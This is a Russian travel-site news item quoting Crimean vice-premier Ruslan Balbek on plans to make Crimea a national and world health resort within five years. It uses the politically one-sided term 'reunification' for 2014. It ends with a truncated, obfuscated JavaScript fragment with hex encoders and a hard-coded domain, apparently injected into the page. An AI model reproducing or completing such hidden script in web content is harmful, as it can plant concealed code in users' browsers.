КАТАЛОГ ТУРОВ НОВОСТИ Россия: Через пять лет Крым станет всероссийской здравницей
 

 

Власти Крыма намерены вернуть полуострову утраченный статус всесоюзной здравницы за пять лет, для этого в инфраструктуру санаторно-курортного комплекса будут направлены многомиллиардные вложения, сообщил журналистам вице-премьер крымского правительства Руслан Бальбек.

"Мы планируем восстановить утраченное имя Крыма как всесоюзной здравницы. При системном подходе и заинтересованности иностранных инвесторов вкладывать в санаторно-курортную отрасль, в течение 5 лет мы сможем полностью восстановить инфраструктуру и превратить полуостров не только во всероссийскую, но и мировую здравницу", — сказал Бальбек, который курирует в крымском правительстве туристический сектор.

По его словам, кроме моря и пляжного отдыха Крым может предложить отдыхающим большое разнообразие памятников культурного наследия разных эпох и цивилизаций, а также уникальный климат, который обладает целебными свойствами. "Это содержание в воздухе большого количества йода, можжевеловые рощи. Еще с царских времен в Крым приезжали на лечение не только россияне, но и иностранцы", — сказал вице-премьер.

Бальбек подчеркнул, что в ближайшие годы на развитие инфраструктуры санаторно-курортной отрасли Крыма из федерального бюджета будут направлены многомиллиардные суммы, также ожидаются значительные вложения инвесторов. На сегодня заинтересованность уже изъявил турецкий бизнес.

"До марта 2016 года будет проведена инвентаризация санаторно-курортного комплекса. На этой площадке определят приоритеты для развития Крыма как лечебного курорта, с привлечением мировых технологий", — сказал вице-премьер.

Крым стал одним из самых популярных направлений для российских туристов после воссоединения полуострова с Россией в марте 2014 года.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "chartex-travel.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e